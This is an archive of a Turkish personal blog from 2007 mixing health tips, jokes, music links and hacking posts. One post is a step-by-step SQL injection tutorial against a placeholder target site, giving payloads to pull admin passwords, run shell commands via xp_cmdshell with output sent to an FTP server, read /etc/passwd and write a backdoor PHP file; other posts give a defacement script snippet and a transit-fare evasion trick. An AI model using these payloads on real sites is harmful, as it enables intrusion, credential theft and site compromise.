Özellikle belirtmek istediğim nokta, çok sayıda hastaya farenjit, sinüzit ya da astım tanısı konulur. Hastaya tedaviler uygulanır ama hastanın şikâyetleri geçmez. Özellikle tedaviye cevap vermeyen bu tür hastalarda Reflü hastalığı değerlendirilmelidir.

Reflü Hastalığının tanısı hastanın muayenesi ve sorgulanması (ki biz buna anamnez diyoruz) sonrası Endoskopik Muayene (Gastroskopi), Baryumlu Pasaj Grafisi, Manometri ve pH Metri denilen yöntemlerle konulur.

Reflü hastalığının tedavisi doktorunuz tarafından belirlenecek olan aşağıdaki yöntemlerle gerçekleştirilir:

* Yaşam tarzı değişiklikleri,
* İlaç tedavisi (proton pompa baskılayıcı ilaç tedavisi, aljenik asit içeren ilaç tedavisi, prokinetik ilaç tedavisi)
* Cerrahi tedavi (reflünün nedeni mide fıtığı ise uygulanır)

Reflüsü Olanlar Yemesin

Yağlı yiyecekler ve kızartmalar,
Turunçgiller ve suları,
Gazlı ve asitli içecekler,
Çay, kahve,
Alkol, sigara.
Salam, sucuk, sosis,
Baharatlar,
Gaz yapan besinler,
Çiğ soğan ve sarımsak,
Ağrı kesici, kas gevşetici ilaçlar,
Kuruyemişler
Çikolata.
Sirke, limon.

Reflüsü Olanlara Öneriler

Geceleri yatmadan iki üç saat önce günün son yemeğini yiyin.
Yatarken sol tarafınıza doğru açılı yatın.
Yüksek yastıkta yatın.
Yolculuğa çıkarken tıka basa yemeyin ve uzun araba yolculuklarında sık sık ara verin. Uçakta ise belli aralarla ayağa kalkın ve hareket edin.
Özellikle tok karnına öne eğilme hareketlerinden kaçının.
Masa başında ya da televizyon karşısında her zaman arkaya doğru geniş açılı oturun.
Hiçbir zaman tıka basa yemek yemeyin.
Öğünleriniz sık ve hafif olsun.
Karnınızı sıkan kemerler takmayın, dar elbiseler giymeyin.
Fazla kilolarınızdan (varsa) kurtulun.

Sağlıklı günler dilerim.

Düz duvara tırmanmak dedikleri bu olsa gerek

2007-04-10T08:18:00.002+02:00

düz duvara tırmanan oyuncak araba

2007-04-09T18:00:00.001+02:00

çorap etiketinin arkasından atatürk resmi çıktı

2007-04-09T11:05:00.001+02:00

pazardan alınan bir çorabın etiketinin arkasından atatürk resmi çıktı.

istemediğiniz sms ler cebinize gelmesin

2007-04-06T15:31:00.000+02:00

merhaba,

mail spam olayının verdiği rahatsızlığın üstüne şimdide cep telefonlarına sms ile spam mesaj yolma olayı ortaya çıktı.
Bilerek veya bilmeden bir siteye veya kuruma, kayıt formunda bulunan cep telefonu bölümüne cep numaranızı eklerseniz büyük bir olasılıkla size reklam sms i gelecektir. çoğu zaman kayıt olduğunuz yerden gelecek olan bu mesajlar ilgi olduğunuz şeyler içerecektir. ancak kayıtlı sms leri satan bir firmaya cep numaranızı vermişseniz veya bu firmaya cep numaranız ulaşmışsa farklı mesajların gelmemesi için çok şanslı olmanız gerekecektir :)

şimdi turkcell in size gelen mesejları filtreleyen bir sisteminden bahsedeceğim.
ADI : MesajSeç
MesajSeç servisi ile ilgilendiğiniz alanları seçebilir, bu alanlarla ilgili tercih ettiğiniz ürün ve kampanya tanıtım kısa mesajlarını alabilir, tercih etmediğiniz kısa mesajları ise bloke edebilirsiniz.

Kullanım
Kısa Mesajla:

Cep telefonunuza gelen kısa mesajı 2780'e göndererek bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz.
Sesli Yanıt Sistemi:

757 27 80 numaralı telefonu arayarak almak istemediğiniz mesajın konusunu belirtebilir, bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz.
MesajSeç Servisi'ne gönderilen kısa mesajlar ve 757 27 80 Sesli Yanıt Sistemi'ni aramak ücretsizdir.

Not: Diğer operatörler üzerinden Turkcell abonelerine gönderilen kısa mesajlar -teknik olarak mümkün olmadığı için- bloke edilemeyecektir.

diğer servis sağlayıcılarda da umarım bu bloke olayı çıkar...

sql injection anlatımı

2007-04-05T16:14:00.000+02:00

Merhaba arkadaşlar..

Sizlere Access, mssql ve mysql sistemlerinde bildiğim sql injection yollarını anlatmaya çalışacağım

Access : Access sitelerde update olmaz. En başta bunu söyleyerek başlayayım. Boşuna update yapmaya çalışmayın. Access sistemlerde tablo ve kolon adlarını öğrenebileceğimiz bir yolda olmadığı için tablo ve kolon adlarını bulmak için tek yol tablo ve kolonları tahmin etmektir.

Diyelim ki sitemiz www.hedefite.com/haber.asp?id=1

şimdi yapacağımı union select ile bilgileri çekmeye çalışmaktır.

www.hedefsite.com/haber.asp?id=1+union+select+0+from+admin

bunu yazdıktan sonra eğer admin tablosu yok ise

-The Microsoft Jet database engine cannot find the input table or query ’admin’. Make sure it exists and that its name is spelled correctly.

var ise

-The number of columns in the two selected tables or queries of a union query do not match.

Şeklinde bi hata alınır. İlk hatayı aldıysak tabloyu tutturamamışız başka tablo adı denememiz gerekir. İkinci hatayı aldıysak tablo adı doğru demektir. Şimdiki işimiz kolon sayısını eşitlemek olacaktır. Hata değişene kadar 0 koymaya devam etmemiz gerekiyor.hata değiştikten sonra yada hata almazsak şimdiki işimiz kolon adlarını tahmin etmek.

Örnek olarak; www.hedefsite.com/haber.asp?id=1+union+select+username,passw ord,0,0,0+from+admin

Access sitelerde sql injection yaparak eğer sitenin bi admin paneli varsa onun şifresini yada bir üyelik girişi falan varsa üyelerin şifrelerini alabiliriz.

Mssql : mssql sql injection için en uygun sistemdir diyebilirim. Mssql sistemlerde hataya zorlayacak karakterleri yazdığımız zaman örnek olarak : haber.asp?id=1’a unclosed hatası alıyorsak update yapabilir. Update yapmak için tablo ve kolon adlarını öğrenmek lazım

Öğrenmek için having 1=1 kullanırız.

www.hedefsite.com/news.asp?id=1 having 1=1

Column ’news.title’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Gibi bi hata alırız. News tablosunda title kolonu varmış.

Diğer kolon adlarını bulmak için

www.hedefsite.com/news.asp?id=1 group by title having 1=1

having 1=1 ‘den önce bulduğumuz kolon adlarını group by ile birlikte yazarak diğer kolon adlarını öğreniriz.

www.hedefsite.com/news.asp?id=1 update tablo_adi set kolon_adi=’yazilmak istenen yazi’;--

şekilde update yapılabilir.

Bir başka kolon ve tablo öğrenme şekli ise şöyle

www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name>’a’))

bu yazdığımız kod ile alfabetik olarak ‘a’ karakterinden büyük olan ilk tablonun adını öğreniriz. Mesela article tablosunu verdi bize. Daha sonra

www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name>’article’))

yazarak article tablosundan daha sonra gelen tabloyu buluruz bu şekilde tüm tablo adlarını bulabiliriz.

www.hedefsite.com/news.asp?id= convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype=’U’ and name=’kolonlarını öğrenmek istediğimiz tablo adı’)))

yazarak biraz önce adını öğrendiğimiz tablonun kolon adlarını öğrenebiliriz. COLUMNID yazan yere 1 , 2 , 3 yazarak sırayla tabloda bulunan kolonları alfabetik olarak öğrenebiliriz.

Having 1=1 ile sadece 1 tablonun adı ve kolon adları öğrenilebilirken bu yöntemle tüm tablo ve kolonlar öğrenilebilir.

Uygulanacak başka bir yol ise veri tabanı kullanıcısı dbo yani admin ise veri tabanında cmd komutu çalıştırabilir bunun sonucunu bir ftp’ye yazdırabiliriz yada istediğimiz bir sorgu sonucunu yine ftp’ye yazdırabiliriz. Burada ihtiyacımız olan yazılabilir ve şifresiz ulaşılabilen bir ftp server ve veri tabanı kullanıcısının dbo olmasıdır. Zaten bu yöntemi video ile anlatmıştım.

Bir sorgu sonucunu ftp’ye yazdırma

www.hedefsite.com/news.asp?id=1;exec+sp_makewebtask+’ftpserv er/a.html’,’select+*+from+tablo_adi’;--

cmd komutu sonucunu ftp’ye yazdırma

www.hedefsite.com/news.asp?id=1;exec master..xp_cmdshell ’dir c:\\\\ > test1.txt’;drop table deneme1;CREATE TABLE deneme1 (txt varchar(8000));BULK INSERT deneme1 FROM ’test1.txt’;exec+sp_makewebtask+’ftpserver/a.html’,’select+* +from+deneme1’;

başka uygulanacak bir yöntem ise serverda dosya oluşturmaktır. Bu şekilde servera fso upload edebilir yada direk index atabiliriz. Yine veri tabanı kullanıcısının admin olması gerekmektedir. Yöntemi kısaca anlatayım. Bununla ilgili 2 video çekmiştim zaten. Şimdi bizim tablodaki verileri dosyaya yazdırma şansımız var. O zaman biz bir tablo oluşturup sonra bu tablo içine oluşturmak istediğimiz dosyaların insert edersek daha sonra bu tablodaki verileri dosyaya yazdırarak serverda istediğimiz dosyayı oluşturabiliriz. Burada dosyaları hex koduna çevirerek insert etmek yararımıza olacaktır çünkü dosyaların içinde bulunan verileri injectionı muhtemelen bozacaktır. Bununla ilgili 2 videom zaten var onlara bakarak çok daha iyi anlayabilirsiniz.

Mysql : bir başka veri tabanı sistemi mysql’dir. Büyük bi çoğunlukla php siteler kullanır. Şunu en başta söyliyeyim php’de update olmaz. Php sitelerde boşuna update denemeyin.

Yapabileceklerini eğer veri tabanı kullanıcısı yetkili değil ise Access ile yapacaklarınızdan ileri geçemez. Union select ile veri çekebilirsiniz. Mysqlde injection kelimeleri arasına /**/ konur. Aslında bu bir şart değildir ama mysqlde /**/ sonlandırı anlamına geliyor sanırım.

www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1,2 ,3/*

bu şekilde kolon sayısını tutturmaya çalışıyoruz. Dikkat ederseniz kolon sayısını tutturmaya çalışırken tablo adı yazmamıza gerek yok.

Eğer yetkisimiz var ise mysql yada information_schema veri tabanlarından veri çekebiliriz. Mysql.user tablosunda kullanici adi ve şifre bilgileri bulunur. Tabi şifre hashlenmiş olarak tutulur. 4.1 öncesi sürümlerde 16 byte ile şifreliyorlardı 4.1 ve sonrası sürümlerde 41 byte ile şifreleniyor. Bu şifreler ancak brute force ile kıralabilir. information_schema.tables tablosundan ise tablo ve kolon adlarını öğrenebilirsiniz.Ayrıca load_file() fonksiyonu ile dosya okuyabiliriz.

www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1, load_file(’/etc/passwd’),3/*

mesela bu şekilde etc passwd dosyasını okuyabiliriz. Eğer magic_quotes_gpc özelliği on ise ‘ karakteri /’ dönüştürüleceği için text olarak yazarak bu yöntem çalışmayacaktır. O zaman char() fonksiyonunu kullanıyoruz. /etc/passwd yazısının karakterlerinin tek tek ascii kodlarını yazarak bu yöntemi uygulayabiliriz.

www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1, char(47,101,116,99,47,112,97,115,115,119,100),3/*

bu yötemi ayrıca sanal dizin biliniyorsa sitenin dosyalarını okumak içinde kullanabiliriz.

/home/www/public_html/ gibi.

Mysql’dede sorgu sonucunu bir dosyaya yazdırma olayı var. Fakat sanal dizin bilinmek zorundadır. Bu işi into outfile komutuyla yaparız.

www.hedefsite.com/news.php?id=1/**/union/**/select/**/0,0,’d osyaya_yazdıralacak_kod ’/**/from/**/users/**/**/INTO/**/OUTFILE/**/’/home/www/www.h edefsite.com/public_html/xxx.php’/*

burada ‘dosyaya yazdırlacak kod yerine’ rfi yiyen küçük bir kod parçacığı yazılarak kendimize bir rfi yolu açabiliriz.

Umarım yararlı olmuşumdur.

Bolivar…

resim dosyasında dosya ya da mesaj saklamak

2007-04-05T13:57:00.001+02:00

öncelikle bir resim dosyası kaydediyorsunuz bizimki x.jpg olsun ardındanda saklamak istediğiniz dosyayı sıkıştırarak kaydediyorsunuz bu dosyamıza da y.rar diyelim..şimdi çalıştırdan cmd yazarak komut satırımıza düşüyoruz daha sonra dosyalarımızın bulunduğu klasöre gelerek"copy /b x.jpg + y.rar z.jpg" yazıyoruz aynı klasörde oluşan z.jpg yi açtığınızda resmi görebileceksiniz aynı zamanda dosyayı winrar ile açarsanız dosyanızında orda olduğunu göreceksiniz..herhangi bir txt dosyasını rarlamadan aynı işlemi yaparsanız oluşan dosyayı notepad ile açtığınızda mesajınız açılan not defterinin sonunda görünecektir..

kaynak : www.wardom.org

index atma-cıklar...

2007-04-05T13:51:00.001+02:00

siteye girişde merhaba dedirtin :)
< s c r i p t >document.body.innerHTML = "merhaba";< /s c r i p t >

dilediğiniz sayfaya yönlendirin..
< s c r i p t >location.replace(site adresi);< /s c r i p t >

< > arasındaki boşlıkları temizleyerek kullanın...

video siteleri arasındaki ilginç mevzular

2007-04-05T09:28:00.001+02:00

pikniktube.com
sendeyolla.com
youtube.com

aynı videoyu üçüne de gönderdim, sadece yootube.com yayınladı.. diğerlerinde ise hala bekliyor yada nedensiz onaylanmadı.

zaten internet yawaş, video yu yüklemek o kadar zamanımızı alıyor, birde onaylamıyorsunuz yahu...

yuh diyorum size...

bu promosyona işeyin lütfen - diyorlar

2007-04-03T16:38:00.000+02:00

dünyanın en hızlı hacker ı siz olun, nasıl mı ?

2007-04-02T15:31:00.003+02:00

serhat sahinkaya Turk Ronaldinho dan futbol dersi

2007-03-30T12:57:00.000+02:00

IE de değişmeyen ana sayfa ya çare

2007-03-29T17:46:00.000+02:00

Yeni bir not defteri açın.

İçine :

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HomePage"=dword:00000000

yazın ve masa üstünüze HomePageUnLockFree.reg olarak kaydedin.

Masaüstündeki HomePageUnLockFree.reg e çift tıklayarak çalıştırın evet i seçin...

IE artık kurtuldu..

Küresel ısınma, ne olur ısınma

2007-03-28T15:50:00.000+02:00

kışın ortasında kar topu oynayamacağız mesela,
havuç da takamayacağız kardan adamların burunlarına...
yağmur duası ezberleyeceğiz mesela hep beraber,
mehtap yerine, yağmur duasına çıkacağız heybeliden...

küresel ısınma, ne olur ısınma,
güneş orada kalsın, ayılarda kutupda...

Bu Registry Dosyasıyla Makinanızı Uçurun!

2007-03-27T16:08:00.000+02:00

ben denedim mükemmel...

http://rapidshare.com/files/23036242/Disophrone.Reg adresinden dosyayı indirip çalıştırın.
Mümkünse Bu Reg Dosyasını Çalıştırmadan Önce Windows Klasörü Gibi sağlam biryere kopyalayıp o klasör içinde çalıştırın.

RIDVAN dilmen yayın arasında basıyor küfürü

2007-03-27T08:50:00.000+02:00

Dj Karax - Mix : Her yerde çalan Remix

2007-03-26T13:44:00.000+02:00

http://rapidshare.com/files/21915167/Dj_Karax_-_Mix.mp3

Bir akbil kullanımı ile iki seyahat

2007-03-24T09:51:00.000+02:00

kontörlü Akbil ile ücretsiz aktarma süresi 1,5 saattir ve bu süre içinde sadece bir defa, bir hattan diğer bir hatta veya bir sistemden diğer sisteme ücretsiz aktarma yapılabilir.
http://www.iett.gov.tr/section.php?sid=23

bu kaynakdan çıkaracak küçük bir hileyi anlatacağım size...

iki kişisiniz ve aynı durakda otobüs bekliyorsunuz, gideceğiniz yönler farklı, yani farklı otobüslere bineceksiniz.
ilk kimin bineceği otobüs gelirse o akbil i basıyor ve akbili diğer arkadaşına veriyor. durakda bekleyen arkadaşın otobüsü gelincede o otobüse binecek. ilk binen için akbil bir bilet düşecek, ikinci binen arkadaş için ise aktarma işlemi yapacak... bir bilete iki seyahat edeceksiniz yani :)

Senai DEMİRCİ Kıl Beni Ey Namaz

2007-03-23T18:33:00.000+02:00

Senai DEMİRCİ den...

Kıl Beni Ey Namaz : http://rapidshare.com/files/22421449/Kil_Beni_Ey_Namaz.MP3

Akşamındır şimdi : http://rapidshare.com/files/22422486/Aksamindir_simdi.MP3

Yandim gül oldum : http://rapidshare.com/files/22521990/Yandim_gul_oldum.MP3

insanın içinden bir şeyler kopuyor sanki...

blog sitesi kurma amacım...

2007-03-23T17:46:00.000+02:00

merhaba diyeyim öncelikle, sizde şimdi merhaba deyin bakiiim.. haa şöyle. henüz tanışmadık ama sizinle, inanıyorum çok sevmeyeceksiniz beni tanışırsak :)
neyse efendim, belki seversiniz değil mi ?

internet ortamında ikinci bir kişilik ediyormuş diyorlar; aynen neo ile bay enderson misali... ajan simit in dediği gibi yani... sanal alemde bir korsan, gerçek hayatta ehli namus bir programcı...
insanın matrix i seyredipde bu tiriplere girmemesi olağan dışı olsa gerek..

çoğu insan msn ortamında yazışırken kendini başka alemlerden gelen biriymiş, erişilmeyen biriymiş gibi tanıtmaya çalışıyor, gerçek hayattada böyle kişilere raslamak mümkün ancak, internetde herkes böyle anacım. kime slm çaksan, önce çok bildik laflar ile samimi olmaya çalışmalar, efendim kendisi bilmem nerenin bir şeyiymiş meğersemli cümleler.. sonra eee sen hiç yazmıyorsun deyivermez mi.. yani klavyede tuş kalmadı ki yazayım, senin yazdıklarına yetişemiyorum.. atıp tutamıyorum senin kadar mesela :)

bende internet aleminde, sanal olan tarafından ynlzbn olarak yaşıyorum... bazı pis işleri buradan yapıyorum mesela :)

neyse ilerde pis işlerimle karşınızda olurum... biraz merak edin :)

sizleri seviyorum bee...

durun durun başlığı amaç diye atmışım blogger a ayıp olmasın lafı toparlayalım: kendini ynlzbn sanan adamın neler yaptığını görmeniz için açtım bu blog u... bakalım neler yapacak...